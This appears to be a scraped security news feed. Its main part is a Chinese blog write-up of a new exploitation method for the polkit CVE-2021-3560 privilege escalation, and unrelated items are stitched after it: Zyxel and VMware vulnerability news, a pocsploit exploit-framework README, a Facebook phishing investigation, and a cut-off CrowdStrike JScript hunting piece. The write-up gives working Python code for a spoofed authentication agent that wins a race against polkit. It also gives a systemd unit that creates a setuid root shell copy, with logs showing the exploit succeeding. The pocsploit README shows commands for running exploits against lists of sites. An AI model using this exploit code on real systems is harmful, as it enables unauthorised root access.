        "http://www.freedesktop.org/standards/PolicyKit/1/policyconfig.dtd">

<policyconfig>
        <vendor>The systemd Project</vendor>
        <vendor_url>http://www.freedesktop.org/wiki/Software/systemd</vendor_url>

        <action id="org.freedesktop.systemd1.manage-unit-files">
                <description gettext-domain="systemd">Manage system service or unit files</description>
                <message gettext-domain="systemd">Authentication is required to manage system service or unit files.</message>
                <defaults>
                        <allow_any>auth_admin</allow_any>
                        <allow_inactive>auth_admin</allow_inactive>
                        <allow_active>auth_admin_keep</allow_active>
                </defaults>
                <annotate key="org.freedesktop.policykit.imply">org.freedesktop.systemd1.reload-daemon org.freedesktop.systemd1.manage-units</annotate>
        </action>

        <action id="org.freedesktop.systemd1.reload-daemon">
                <description gettext-domain="systemd">Reload the systemd state</description>
                <message gettext-domain="systemd">Authentication is required to reload the systemd state.</message>
                <defaults>
                        <allow_any>auth_admin</allow_any>
                        <allow_inactive>auth_admin</allow_inactive>
                        <allow_active>auth_admin_keep</allow_active>
                </defaults>
        </action>

</policyconfig>

可以发现,org.freedesktop.systemd1.manage-unit-files 这个 action 拥有 org.freedesktop.policykit.imply 修饰,这个修饰的意义是,当一个 subject 拥有 org.freedesktop.systemd1.reload-daemon 或者 org.freedesktop.systemd1.manage-units 权限时,也同时拥有此项权限。所以被修饰过的方法基本上可以视作为和修饰方法等价的,这也就是这个修饰的作用。

话说回来,在实际上,被此漏洞所影响的上层函数并不止 check_authorization_sync ,如下所有函数都会被这个漏洞所影响:

  1. polkit_system_bus_name_get_creds_sync
  2. polkit_backend_session_monitor_get_user_for_subject
  3. check_authorization_sync

通过搜索代码,我发现了一个对我而言十分熟悉的函数调用了 polkit_backend_session_monitor_get_user_for_subject 函数:polkit_backend_interactive_authority_authentication_agent_response

static gboolean
polkit_backend_interactive_authority_authentication_agent_response (PolkitBackendAuthority   *authority,
                                                              PolkitSubject            *caller,
                                                              uid_t                     uid,
                                                              const gchar              *cookie,
                                                              PolkitIdentity           *identity,
                                                              GError                  **error)
{

  // ...
  identity_str = polkit_identity_to_string (identity);
  g_debug ("In authentication_agent_response for cookie '%s' and identity %s",
           cookie,
           identity_str);
  user_of_caller = polkit_backend_session_monitor_get_user_for_subject (priv->session_monitor,
                                                                        caller, NULL,
                                                                        error);

  /* only uid 0 is allowed to invoke this method */
  if (!identity_is_root_user (user_of_caller)) {
      goto out;
  }
  // ...

这个方法是 PolicyKit 用来处理 Authentication Agent 调用的 AuthenticationAgentResponseAuthenticationAgentResponse2 方法的。那么,什么是 Authentication Agent,它又拥有什么作用呢?

0x03. What is Authentication Agent

在日常使用 Linux 的时候,如果不是利用 root 账号登录桌面环境,在执行一些需要 root 权限的操作时,通常会跳出一个对话框让你输入密码,这个对话框的程序就是 Authentication Agent:

A New Exploit Method for CVE-2021-3560 PolicyKit Linux Privilege Escalation

在命令行中,同样也有 Authentication Agent,比如 pkexec 命令:

A New Exploit Method for CVE-2021-3560 PolicyKit Linux Privilege Escalation

一个 Authentication Agent 通常为 suid 程序,这样可以保证调用 PolicyKit 的授权方法时的调用方(caller)为 root,而来自 root 用户的方法调用是可以信任的。Authencation Agent的认证流程如下所示:

A New Exploit Method for CVE-2021-3560 PolicyKit Linux Privilege Escalation
  1. Client 在需要提升权限时,会启动 setuid 的 Authentication Agent;
  2. Authentication Agent 会启动一个 D-Bus 服务,用来接收 PolicyKit 的相关认证调用;
  3. Authentication Agent 会去 PolicyKit 注册自己,来接管对于客户端程序调用的 D-Bus 方法的认证请求: CheckAuthorization
  4. 当收到 CheckAuthorization 请求时,PolicyKit 会调用 Authencation Agent 的 BeginAuthentication 方法;
  5. Authentication Agent 接收到方法调用后,会要求用户输入密码进行认证;
  6. Authentication Agent 验证密码没有问题,则会调用 PolicyKit 提供的 AuthenticationAgentResponse 方法;
  7. PolicyKit 收到 AuthenticationAgentResponse 方法调用后,会检查调用方是不是 root 权限,接着会检查其他信息(cookie);
  8. 检查无误后,PolicyKit 对于 D-Bus Service 的 CheckAuthorization 方法返回 TRUE,表示认证通过;
  9. D-Bus Service 收到返回后,允许执行用户所调用的方法。

虽然流程较为复杂,但是不难发现,整个流程的信任保证主要是在第 7 步中验证 AuthenticationAgentResponse 的调用方是否为 root。但是由于 CVE-2021-3560 的存在,这个信任被打破了。所以我们可以通过伪造 AuthenticationAgentResponse 的调用方,来完成整个认证流程,实现任意 D-Bus Service 方法的调用。

0x04. Write Your Agent

利用 dbus-python 和相关 example 代码,我们可以实现一个 Authencation Agent 的基本骨架:

import os
import dbus
import dbus.service
import threading

from gi.repository import GLib
from dbus.mainloop.glib import DBusGMainLoop


class PolkitAuthenticationAgent(dbus.service.Object):
    def __init__(self):
        bus = dbus.SystemBus(mainloop=DBusGMainLoop())
        self._object_path = '/org/freedesktop/PolicyKit1/AuthenticationAgent'
        self._bus = bus
        with open("/proc/self/stat") as stat:
            tokens = stat.readline().split(" ")
            start_time = tokens[21]

        self._subject = ('unix-process',
                         {'pid': dbus.types.UInt32(os.getpid()),
                          'start-time': dbus.types.UInt64(int(start_time))})

        bus.exit_on_disconnect = False
        dbus.service.Object.__init__(self, bus, self._object_path)
        self._loop = GLib.MainLoop()
        self.register()
        print('[*] D-Bus message loop now running ...')
        self._loop.run()

    def register(self):
        proxy = self._bus.get_object(
                'org.freedesktop.PolicyKit1',
                '/org/freedesktop/PolicyKit1/Authority')
        authority = dbus.Interface(
                proxy,
                dbus_interface='org.freedesktop.PolicyKit1.Authority')
        authority.RegisterAuthenticationAgent(self._subject,
                                              "en_US.UTF-8",
                                              self._object_path)
        print('[+] PolicyKit authentication agent registered successfully')
        self._authority = authority

    @dbus.service.method(
            dbus_interface="org.freedesktop.PolicyKit1.AuthenticationAgent",
            in_signature="sssa{ss}saa{sa{sv}}", message_keyword='_msg')
    def BeginAuthentication(self, action_id, message, icon_name, details,
                            cookie, identities, _msg):
        print('[*] Received authentication request')
        print('[*] Action ID: {}'.format(action_id))
        print('[*] Cookie: {}'.format(cookie))

        ret_message = dbus.lowlevel.MethodReturnMessage(_msg)
        message = dbus.lowlevel.MethodCallMessage('org.freedesktop.PolicyKit1',
                                                  '/org/freedesktop/PolicyKit1/Authority',
                                                  'org.freedesktop.PolicyKit1.Authority',
                                                  'AuthenticationAgentResponse2')
        message.append(dbus.types.UInt32(os.getuid()))
        message.append(cookie)
        message.append(identities[0])
        self._bus.send_message(message)


def main():
    threading.Thread(target=PolkitAuthenticationAgent).start()


if __name__ == '__main__':
    main()


接着尝试增加代码,进行调用:

def handler(*args):
    print('[*] Method response: {}'.format(str(args)))


def set_timezone():
    print('[*] Starting SetTimezone ...')
    bus = dbus.SystemBus(mainloop=DBusGMainLoop())
    obj = bus.get_object('org.freedesktop.timedate1', '/org/freedesktop/timedate1')
    interface = dbus.Interface(obj, dbus_interface='org.freedesktop.timedate1')
    interface.SetTimezone('Asia/Shanghai', True, reply_handler=handler, error_handler=handler)


def main():
    threading.Thread(target=PolkitAuthenticationAgent).start()
    time.sleep(1)
    threading.Thread(target=set_timezone).start()

运行程序:

[email protected]:~$ python3 agent.py
[+] PolicyKit authentication agent registered successfully
[*] D-Bus message loop now running ...
[*] Received authentication request
[*] Action ID: org.freedesktop.timedate1.set-timezone
[*] Cookie: 3-31e1bb8396c301fad7e3a40706ed6422-1-0a3c2713a55294e172b441c1dfd1577d
[*] Method response: (DBusException(dbus.String('Permission denied')),)

同时 PolicyKit 的输出为:

** (polkitd:186082): DEBUG: 00:37:29.575: In authentication_agent_response for cookie '3-31e1bb8396c301fad7e3a40706ed6422-1-0a3c2713a55294e172b441c1dfd1577d' and identity unix-user:root
** (polkitd:186082): DEBUG: 00:37:29.576: OUT: Only uid 0 may invoke this method.
** (polkitd:186082): DEBUG: 00:37:29.576: Authentication complete, is_authenticated = 0
** (polkitd:186082): DEBUG: 00:37:29.577: In check_authorization_challenge_cb
  subject                system-bus-name::1.6846
  action_id              org.freedesktop.timedate1.set-timezone
  was_dismissed          0
  authentication_success 0

00:37:29.577: Operator of unix-process:186211:9138723 FAILED to authenticate to gain authorization for action org.freedesktop.timedate1.set-timezone for system-bus-name::1.6846 [python3 agent.py] (owned by unix-user:dev)

可见我们的 Authentication Agent 已经正常工作了,可以接收到 PolicyKit 发送的 BeginAuthentication 方法调用,并且PolicyKit 会提示 Only uid 0 may invoke this method,是因为我们的 AuthenticationAgentResponse 发送用户为 dev 用户而非 root 用户。

0x05. Trigger The Vulnerability

接下来尝试触发漏洞,我们尝试在发送完请求后立刻结束进程:

self._bus.send_message(message)
os.kill(os.getpid(), 9)

多次调用查看:

** (polkitd:186082): DEBUG: 01:09:17.375: In authentication_agent_response for cookie '51-20cf92ca04f0c6b029d0309dbfe699b5-1-3d3e63e4e98124979952a29a828057c7' and identity unix-user:root
** (polkitd:186082): DEBUG: 01:09:17.377: OUT: RET: 1
** (polkitd:186082): DEBUG: 01:09:17.377: Removing authentication agent for unix-process:189453:9329523 at name :1.6921, object path /org/freedesktop/PolicyKit1/AuthenticationAgent (disconnected from bus)
01:09:17.377: Unregistered Authentication Agent for unix-process:189453:9329523 (system bus name :1.6921, object path /org/freedesktop/PolicyKit1/AuthenticationAgent, locale en_US.UTF-8) (disconnected from bus)
** (polkitd:186082): DEBUG: 01:09:17.377: OUT: error
Error performing authentication: GDBus.Error:org.freedesktop.DBus.Error.NoReply: Message recipient disconnected from message bus without replying (g-dbus-error-quark 4)

(polkitd:186082): GLib-WARNING **: 01:09:17.379: GError set over the top of a previous GError or uninitialized memory.
This indicates a bug in someone's code. You must ensure an error is NULL before it's set.
The overwriting error message was: Failed to open file ?/proc/0/cmdline?: No such file or directory
Error opening `/proc/0/cmdline': GDBus.Error:org.freedesktop.DBus.Error.NameHasNoOwner: Could not get UID of name ':1.6921': no such name
** (polkitd:186082): DEBUG: 01:09:17.380: In check_authorization_challenge_cb
  subject                system-bus-name::1.6921
  action_id              org.freedesktop.timedate1.set-timezone
  was_dismissed          0
  authentication_success 0

可以发现,polkit_backend_interactive_authority_authentication_agent_response 函数的返回值为 TRUE,但是在 check_authorization_challenge_cb 函数中仍然是未授权状态,注意到 Error performing authentication 的错误信息,定位到函数 authentication_agent_begin_cb

static void
authentication_agent_begin_cb (GDBusProxy   *proxy,
                               GAsyncResult *res,
                               gpointer      user_data)
{
  error = NULL;
  result = g_dbus_proxy_call_finish (proxy, res, &error);
  if (result == NULL)
    {
      g_printerr ("Error performing authentication: %s (%s %d)\n",
                  error->message,
                  g_quark_to_string (error->domain),
                  error->code);
      if (error->domain == POLKIT_ERROR && error->code == POLKIT_ERROR_CANCELLED)
        was_dismissed = TRUE;
      g_error_free (error);
    }
  else
    {
      g_variant_unref (result);
      gained_authorization = session->is_authenticated;
      g_debug ("Authentication complete, is_authenticated = %d", session->is_authenticated);
    }

代码逻辑为,当 g_dbus_proxy_call_finish 函数没有错误的情况下,才会设置 is_authenticated 为 TRUE。而 g_dbus_proxy_call_finish 函数的作用描述如下:

Finishes an operation started with g_dbus_proxy_call().
You can then call g_dbus_proxy_call_finish() to get the result of the operation.

而同时错误信息也显示了:

Message recipient disconnected from message bus without replying

如果想成功的进行条件竞争,首先就需要解决这个问题。通过 dbus-monitor 命令观察正常情况和错误情况的调用结果,成功的情况如下所示:

method call   sender=:1.3174 -> destination=:1.3301 serial=6371 member=BeginAuthentication
method call   sender=:1.3301 -> destination=:1.3174 serial=6    member=AuthenticationAgentResponse2 
method return sender=:1.3301 -> destination=:1.3174 serial=7 reply_serial=6371

失败的情况如下所示:

method call sender=:1.3174 -> destination=:1.3301 serial=12514 member=BeginAuthentication 
method call sender=:1.3301 -> destination=:1.3174 serial=6     member=AuthenticationAgentResponse2 
error       sender=org.freedesktop.DBus -> destination=:1:3174 error_name=org.freedesktop.DBus.Error.NoReply

其中 :1:3174 为 PolicyKit,:1.3301 为 Authentication Agent。成功的情况下,Authentication Agent 会发送一个 method return 消息,指向的是 BeginAuthentication 的调用序列号,表示这个方法已经成功调用了,而失败的情况下则是由 D-Bus Daemon 向 PolicyKit 发送一个 NoReply 的错误。

0x06. The Time Window

通过以上分析可以得到我们的漏洞触发的时间窗口:在发送 method return 消息后,在获取 AuthenticationAgentResponse2 的 caller 前结束进程。为了精确控制消息发送,我们修改 Authentication Agent 的代码如下:

    @dbus.service.method(
            dbus_interface="org.freedesktop.PolicyKit1.AuthenticationAgent",
            in_signature="sssa{ss}saa{sa{sv}}", message_keyword='_msg')
    def BeginAuthentication(self, action_id, message, icon_name, details,
                            cookie, identities, _msg):
        print('[*] Received authentication request')
        print('[*] Action ID: {}'.format(action_id))
        print('[*] Cookie: {}'.format(cookie))


        def send(msg):
            self._bus.send_message(msg)

        ret_message = dbus.lowlevel.MethodReturnMessage(_msg)
        message = dbus.lowlevel.MethodCallMessage('org.freedesktop.PolicyKit1',
                                                  '/org/freedesktop/PolicyKit1/Authority',
                                                  'org.freedesktop.PolicyKit1.Authority',
                                                  'AuthenticationAgentResponse2')
        message.append(dbus.types.UInt32(os.getuid()))
        message.append(cookie)
        message.append(identities[0])
        threading.Thread(target=send, args=(message, )).start()
        threading.Thread(target=send, args=(ret_message, )).start()
        os.kill(os.getpid(), 9)

查看 PolicyKit 输出,发现已经成功认证:

** (polkitd:192813): DEBUG: 01:42:29.925: In authentication_agent_response for cookie '3-7c19ac0c4623cf4548b91ef08584209f-1-22daebe24c317a3d64d74d2acd307468' and identity unix-user:root
** (polkitd:192813): DEBUG: 01:42:29.928: OUT: RET: 1
** (polkitd:192813): DEBUG: 01:42:29.928: Authentication complete, is_authenticated = 1

(polkitd:192813): GLib-WARNING **: 01:42:29.934: GError set over the top of a previous GError or uninitialized memory.
This indicates a bug in someone's code. You must ensure an error is NULL before it's set.
The overwriting error message was: Failed to open file ?/proc/0/cmdline?: No such file or directory
Error opening `/proc/0/cmdline': GDBus.Error:org.freedesktop.DBus.Error.NameHasNoOwner: Could not get UID of name ':1.7428': no such name
** (polkitd:192813): DEBUG: 01:42:29.934: In check_authorization_challenge_cb
  subject                system-bus-name::1.7428
  action_id              org.freedesktop.timedate1.set-timezone
  was_dismissed          0
  authentication_success 1

同时系统时区也已经成功更改。

0x07. Before The Exploit

相比于漏洞作者给出的 Account Daemon 利用,我选择了使用 org.freedesktop.systemd1。首先我们摆脱了必须使用 org.freedesktop.policykit.imply 修饰过的方法的限制,其次因为这个 D-Bus Service 几乎在每个 Linux 系统都存在,最后是因为这个方法存在一些高风险方法。

$ gdbus introspect --system -d org.freedesktop.systemd1 -o /org/freedesktop/systemd1
...
  interface org.freedesktop.systemd1.Manager {
      ...
      StartUnit(in  s arg_0,
                in  s arg_1,
                out o arg_2);
      ...
      EnableUnitFiles(in  as arg_0,
                      in  b arg_1,
                      in  b arg_2,
                      out b arg_3,
                      out a(sss) arg_4);
      ...
  }
...

EnableUnitFiles 可以接受传入一组 systemd 单元文件路径,并加载进入 systemd,接着再调用ReloadStartUnit 方法后即可以 root 权限执行任意命令。systemd 单元文件内容如下:

[Unit]
AllowIsolate=no

[Service]
ExecStart=/bin/bash -c 'cp /bin/bash /usr/local/bin/pwned; chmod +s /usr/local/bin/pwned'

看似流程非常明确,但是在实际利用中却出现了问题。问题出在 EnableUnitFiles  方法,首先编写代码调用此方法:

def enable_unit_files():
    print('[*] Starting EnableUnitFiles ...')
    bus = dbus.SystemBus(mainloop=DBusGMainLoop())
    obj = bus.get_object('org.freedesktop.systemd1', '/org/freedesktop/systemd1')
    interface = dbus.Interface(obj, dbus_interface='org.freedesktop.systemd1.Manager')
    interface.EnableUnitFiles(['test'], True, True, reply_handler=handler, error_handler=handler)

运行后输出如下:

[email protected]:~$ python3 agent.py
[*] Starting EnableUnitFiles ...
[+] PolicyKit authentication agent registered successfully
[*] D-Bus message loop now running ...
[*] Method response: (DBusException(dbus.String('Interactive authentication required.')),)

可见并没有进入我们注册的 Authentication Agent,而是直接输出了 Interactive authentication required 的错误信息。通过实际的代码分析,定位到如下代码逻辑:

static void
polkit_backend_interactive_authority_check_authorization (PolkitBackendAuthority         *authority,
                                                          PolkitSubject                  *caller,
                                                          PolkitSubject                  *subject,
                                                          const gchar                    *action_id,
                                                          PolkitDetails                  *details,
                                                          PolkitCheckAuthorizationFlags   flags,
                                                          GCancellable                   *cancellable,
                                                          GAsyncReadyCallback             callback,
                                                          gpointer                        user_data)
{
  // ...
  if (polkit_authorization_result_get_is_challenge (result) &&
      (flags & POLKIT_CHECK_AUTHORIZATION_FLAGS_ALLOW_USER_INTERACTION))
    {
      AuthenticationAgent *agent;
      agent = get_authentication_agent_for_subject (interactive_authority, subject);
      if (agent != NULL)
        {
          g_object_unref (result);
          result = NULL;

          g_debug (" using authentication agent for challenge");
          authentication_agent_initiate_challenge (agent,
                                                   // ...
          goto out;
        }
    }

这里检查了 Message Flags 的 POLKIT_CHECK_AUTHORIZATION_FLAGS_ALLOW_USER_INTERACTION 是不是为 0,如果是 0,则不会进入到使用 Authencation Agent 的分支。通过查阅文档,我发现 POLKIT_CHECK_AUTHORIZATION_FLAGS_ALLOW_USER_INTERACTION 是消息发送者可控的,D-Bus 的类库提供了相应的 setter:https://dbus.freedesktop.org/doc/api/html/group__DBusMessage.html#gae734e7f4079375a0256d9e7f855ec4e4,也就是 dbus_message_set_allow_interactive_authorization 方法。

但是当我去翻阅 dbus-python 的文档时,发现其并没有提供这个方法。于是我修改了版 dbus-python添加了此方法,地址为:https://gitlab.freedesktop.org/RicterZ/dbus-python

PyDoc_STRVAR(Message_set_allow_interactive_authorization__doc__,
"message.set_allow_interactive_authorization(bool) -> None\n"
"Set allow interactive authorization flag to this message.\n");
static PyObject *
Message_set_allow_interactive_authorization(Message *self, PyObject *args)
{
    int value;
    if (!PyArg_ParseTuple(args, "i", &value)) return NULL;
    if (!self->msg) return DBusPy_RaiseUnusableMessage();
    dbus_message_set_allow_interactive_authorization(self->msg, value ? TRUE : FALSE);
    Py_RETURN_NONE;
}

同时这项修改已经提交 Merge Request 了,希望之后会被合并。

0x08. The Final Exploit

添加了 set_allow_interactive_authorization 后,利用 dbus-python 提供的低级接口构建消息:

def method_call_install_service():
    time.sleep(0.1)
    print('[*] Enable systemd unit file \'{}\' ...'.format(FILENAME))
    bus2 = dbus.SystemBus(mainloop=DBusGMainLoop())
    message = dbus.lowlevel.MethodCallMessage(NAME, OBJECT, IFACE, 'EnableUnitFiles')
    message.set_allow_interactive_authorization(True)
    message.set_no_reply(True)
    message.append(['/tmp/{}'.format(FILENAME)])
    message.append(True)
    message.append(True)
    bus2.send_message(message)

设置之后再发送即可收到 PolicyKit 发来的 BeginAuthentication 请求了。实际编写框架已经大体明了了,写一个利用出来并不困难。最终利用成功截图如下:

A New Exploit Method for CVE-2021-3560 PolicyKit Linux Privilege Escalation

Golang 和 C 版本的利用代码如下:

0x09. Conclusion

CVE-2021-3560 是一个危害被低估的漏洞,我认为是由于漏洞作者不是特别熟悉 D-Bus 和 PolicyKit 的相关机制导致错过了 Authentication Agent 的特性,从而构建出限制较大的 PoC。我自是不敢说精通 D-Bus 和 PolicyKit,但是在最近时间的漏洞挖掘和研究过程中,参考了大量的文档、历史漏洞分析,同时阅读了大量的代码后,才能意识到使用 Authentication Agent 来进行利用的可能性。

同时,作为一个 Web 漏洞的安全研究员,我自是将所有的东西都类型转换到 Web 层面去看待。D-Bus 和 Web 非常相似,在挖掘提权的过程中并没有受到特别大的阻力,却收获了非常多的成果。希望各位安全从业者通过 D-Bus 来入门二进制,跳出自己的舒适圈,也可以增加自己在漏洞挖掘中的视野(什么,内存破坏洞?想都不要想了,开摆.jpg)。

0x0a. Reference

Zyxel Issues Patches for 4 New Flaws Affecting AP, API Controller, and Firewall Devices

27 May 2022 at 07:28
Zyxel has released patches to address four security flaws affecting its firewall, AP Controller, and AP products to execute arbitrary operating system commands and steal select information. The list of security vulnerabilities is as follows - CVE-2022-0734 - A cross-site scripting (XSS) vulnerability in some firewall versions that could be exploited to access information stored in the user's

Experts released PoC exploit code for critical VMware CVE-2022-22972 flaw

27 May 2022 at 05:58

Security researchers released PoC exploit code for the critical authentication bypass vulnerability CVE-2022-22972 affecting multiple VMware products.

Horizon3 security researchers have released a proof-of-concept (PoC) exploit and technical analysis for the critical authentication bypass vulnerability CVE-2022-22972 affecting multiple VMware products.

The virtualization giant recently warned that a threat actor can exploit the CVE-2022-22972 flaw (CVSSv3 base score of 9.8) to obtain admin privileges and urges customers to install patches immediately.

“This critical vulnerability should be patched or mitigated immediately per the instructions in VMSA-2021-0014. The ramifications of this vulnerability are serious.” states VMware.

The CVE-2022-22972 flaw affects Workspace ONE Access, VMware Identity Manager (vIDM), and vRealize Automation.

“VMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users.” reads the advisory published by the company. “A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate.”

The company acknowledged Bruno López of Innotec Security for the discovery of the flaw.

VMware addressed the flaw and also provided workarounds for admins who cannot immediately install security patches.

VMware did not provide technical details about the flaw, then Horizon3 researchers performed an analysis of the patch. 

“Our POC sends requests starting at the /vcac endpoint the same way a browser would and parses the login page to extract these hidden fields. These hidden fields are then encoded into the body of the final POST with the Host header set to our custom login server. The POC then parses the response to extract the authentication cookies. These cookies can be used to execute actions as the chosen user.” reads the analysis published by the researchers. “This script can be used by bypass authentication on vRealize Automation 7.6 using CVE-2022-22972. Workspace ONE and vIDM have different authentication endpoints, but the crux of the vulnerability remains the same.”

The experts pointed out that the CVE-2022-22972 issue is a relatively simple Host header manipulation vulnerability.

cve-2022-22972

Threat actors could easily exploit this issue. Searching on Shodan.io for the affected VMware applications we can find organizations in the healthcare and education industries, and state government potentially vulnerable.

The Cybersecurity and Infrastructure Security Agency (CISA) issued the Emergency Directive 22-03 to order federal agencies to fix VMware CVE-2022-22972 and CVE-2022-22973 flaws or to remove the affected products from their networks by May 23, 2022.

DHS also orders federal agencies to report the status of all VMware installs on their networks into Cyberscope by May 24, 2022.

The Cybersecurity and Infrastructure Security Agency (CISA) further highlighted this security flaw’s severity lev

Security Affairs is one of the finalists for the best European Cybersecurity Blogger Awards 2022 – VOTE FOR YOUR WINNERS. I ask you to vote for me again (even if you have already done it), because this vote is for the final.

Please vote for Security Affairs and Pierluigi Paganini in every category that includes them (e.g. sections “The Underdogs – Best Personal (non-commercial) Security Blog” and “The Tech Whizz – Best Technical Blog”)

To nominate, please visit: 

https://docs.google.com/forms/d/e/1FAIpQLSdNDzjvToMSq36YkIHQWwhma90SR0E9rLndflZ3Cu_gVI2Axw/viewform

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, VMWare)

The post Experts released PoC exploit code for critical VMware CVE-2022-22972 flaw appeared first on Security Affairs.

Yesterday — 26 May 2022Main stream

Pocsploit - A Lightweight, Flexible And Novel Open Source Poc Verification Framework


pocsploit is a lightweight, flexible and novel open source poc verification framework

Pain points of the POC framework in the market

  1. There are too many params, I don't know how to get started, but only some of them are commonly used.
  2. YAML poc framework(like nuclei & xray) is not flexible enough. the conversion cost is very high when writing poc. Sometimes it's hard when encountering non-http protocols. (only hex can be used)
  3. Sometimes POC has false positives, which can be avoided by accurate fingerprint matching.
  4. It is heavily dependent on the framework. Poc in pocsploit can be used in the framework and can also be used alone.

Advantages of pocsploit

  1. Lighter, does not depend on the framework, a single poc can run
  2. Easier to rewrite Poc
  3. More flexible (compared to nuclei, xray, goby, etc.)
  4. Fewer false positives, providing fingerprint prerequisite judgment, you can first judge whether the site has the fingerprint of a certain component, and then perform POC verification, which is more accurate
  5. There are many ways to use, providing poc / exp
  6. Detailed vulnerability information display
  7. Poc ecological sustainability: I will continue to update the Poc to modules/, and welcome everyone to join us Contribute Poc

Encountered code/poc issues, please Submit issue

Poc Statistics

cve cnnvd others
345 7 102

Usage

Install requirements

pip3 install -r requirements.txt
  • poc to verify single website
python3 pocsploit.py -iS "http://xxxx/" -r "modules/" -t 100 --poc
  • specific poc
python3 pocslpoit.py -iS "http://xxxxx" -r "modules/vulnerabilities/thinkphp/thinkphp-5022-rce.py" --poc
  • exp to exploit many websites (with urls in a file)
python3 pocslpoit.py -iF "urls.txt" -r "modules/vulnerabilities/" --exp
  • Turn on fingerprint pre-verification, verify the fingerprint first, and then enter the poc verification after matching
python3 pocslpoit.py -iS "http://xxxxx" -r "modules/vulnerabilities/thinkphp/thinkphp-5022-rce.py" --poc --fp
  • Output to file & console quiet mode
python3 pocslpoit.py -iS "http://xxxx" -r "modules/vulnerabilities/" --poc -o result/result.log -q
  • Other Usage
python3 pocsploit.py --help



others

OOB

Please config conf/config.py

P.S. How to build your own DNSLog,please visit Hyuga-DNSLog

  • DNSLOG_URI: DNSLog Address
  • DNSLOG_TOKEN: Token
  • DNSLOG_IDENTIFY: your identity


Exposed: the threat actors who are poisoning Facebook

26 May 2022 at 20:40

An investigation of the infamous “Is That You?” video scam led Cybernews researchers into exposing threat actors who are poisoning Facebook

Original post @ https://cybernews.com/security/exposed-the-threat-actors-who-are-poisoning-facebook/

An investigation of the infamous “Is That You?” video scam has led Cybernews researchers to a cybercriminal stronghold, from which threat actors have been infecting the social media giant with thousands of malicious links every day. At least five suspects, thought to be residing in the Dominican Republic, have been identified.

Facebook has long been a happy hunting ground for online crooks, who take great pleasure in turning unwary members of the internet community into their prey.

It can start with something as seemingly innocuous as a message from a “friend” – in fact a cybercriminal pretending to be such – inviting you to click on a juicy link to the next big share-fest, be it a music clip, funny video, or anything else you might be interested in.

Is that you scam infographic
Screenshot of the original Is That You? scam uncovered on Facebook.

The only thing that’s juicy about such bogus links is the bundle of personal details you are giving up by clicking on them, because it won’t be the latest hot clip you’re sharing when you do – just your name, address, and passwords, which are then harvested for profit by the threat actor who has fooled you.

Given its likelihood of being used as a platform for such scams, Facebook has been on the Cybernews radar for some time – in February last year, we exposed the “Is That You?” phishing scam on its Messenger service that had been doing the rounds since at least 2017.

Since then, the research team has remained vigilant, keeping tabs on suspect activities on Facebook. Recently, that vigilance was rewarded when we received a tip-off from fellow cyber investigator Aidan Raney – who first reached out to us after our original findings were published – that malicious links were being distributed to users.

Upon further examination, it turned out that thousands of these phishing links had been distributed, through a devious network sprawling across the back channels of the social media platform.

Left unchecked, this could result in hundreds of thousands of unwary social media users falling foul of the dodgy links – the “Is That You?” scam was thought to have hooked in around half a million victims before we uncovered it.

That campaign was initiated by sending the potential mark a message from one of their Facebook contacts. The message contained what appears to be a video link with a text in German suggesting that they are featured in the clip.

Is that you infograph
Mind map of a devious cybercriminal enterprise.

The game is afoot!

Hot for the chase, our cyber detectives began their inquiry by scrutinizing a malicious link sent to one victim, to learn how the scam had been put together.

“I figured out what servers did what, where code was hosted, and how I could identify other servers,” said Raney. “I then used this information and urlscan.io [a website that allows one to scan URLs] to look for more phishing links matching the same characteristics as this one.”

A thorough search of servers connected to the phishing links turned up a page that was sending credentials to a site called devsbrp.app. Further scrutiny revealed a banner thought to be attached to a control panel, with the text “panelfps by braunnypr” written on it.

Using these as keywords in a subsequent search led the research team straight to the panel and banner creator, whose email address and password combinations were also discovered – neatly turning the tables on cybercriminals used to stealing credentials of unsuspecting web users.

Inside a criminal stronghold

Using the threat actor’s own details, Cybernews accessed a website that turned out to be the command and control center for most of the phishing attacks linked to the gang, thought to number at least five threat actors but possibly many more. This provided our intrepid investigators with a trove of information on the crooks behind the Facebook phishing scam, including their likely country of residence – the Dominican Republic.

“We were able to export the user list for everybody registered to this panel,” said the Cybernews researcher. “Using the usernames on the list, we started uncovering the identities of as many people on the list as people, but there is still more work to be done.”

One of the suspects that Raney identified is likely the same threat actor that the Cybernews research team was able to name in February 2021. Back then, we sent the relevant information to the Cyber Emergency Response Team (CERT) in the Dominican Republic, as evidence suggested that the campaign was also launched from there.

At the time of writing, all relevant information has been handed over to the authorities pending further investigation.

If you want to know how to protect yourself, give a look at this post:

https://cybernews.com/security/exposed-the-threat-actors-who-are-poisoning-facebook/

Security Affairs is one of the finalists for the best European Cybersecurity Blogger Awards 2022 – VOTE FOR YOUR WINNERS. I ask you to vote for me again (even if you have already done it), because this vote is for the final.

Please vote for Security Affairs and Pierluigi Paganini in every category that includes them (e.g. sections “The Underdogs – Best Personal (non-commercial) Security Blog” and “The Tech Whizz – Best Technical Blog”)

To nominate, please visit: 

https://docs.google.com/forms/d/e/1FAIpQLSdNDzjvToMSq36YkIHQWwhma90SR0E9rLndflZ3Cu_gVI2Axw/viewform

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Facebook)

The post Exposed: the threat actors who are poisoning Facebook appeared first on Security Affairs.

How Defenders Can Hunt for Malicious JScript Executions: A Perspective from OverWatch Elite

An adversary’s ability to live off the land — relying on the operating system’s built-in tooling and user-installed legitimate software rather than tooling that must be brought in — may allow them to navigate through a victim organization’s network relatively undetected. CrowdStrike Falcon OverWatch™ threat hunters are acutely aware of adversaries’ love of these living off the land binaries (LOLBins) and build their hunts accordingly. In recent months, OverWatch Elite, a part of CrowdStrike’s Falcon OverWatch managed threat hunting service, has seen an increase in the use of JScript in hands-on-keyboard intrusions. 

JScript vs JavaScript

JScript is a Microsoft-dialect of standard JavaScript, a scripting language that can be used in a web browser setting to add custom functionality to web pages. JScript, however, is an Active Scripting language, meaning it is more integrated into the operating system. JScript can be executed as a standalone file. It is often used to write files to disk, make registry changes, make network connections, execute commands and more. 

While JScript and JavaScript are distinct scripting mechanisms, they both use the same file extension: .js. By default, double-clicking on a .js file in Windows Explorer will cause it to open the file with Windows Script Host executable wscript.exe, which will execute the code. Because wscript.exe is signed by Microsoft and is included in every Windows installation, it is often considered trusted by more traditional security solutions. Although when a .js file is downloaded from the internet an extra warning dialog is displayed prior to execution, our telemetry shows that this does not stop users from proceeding with the execution. 

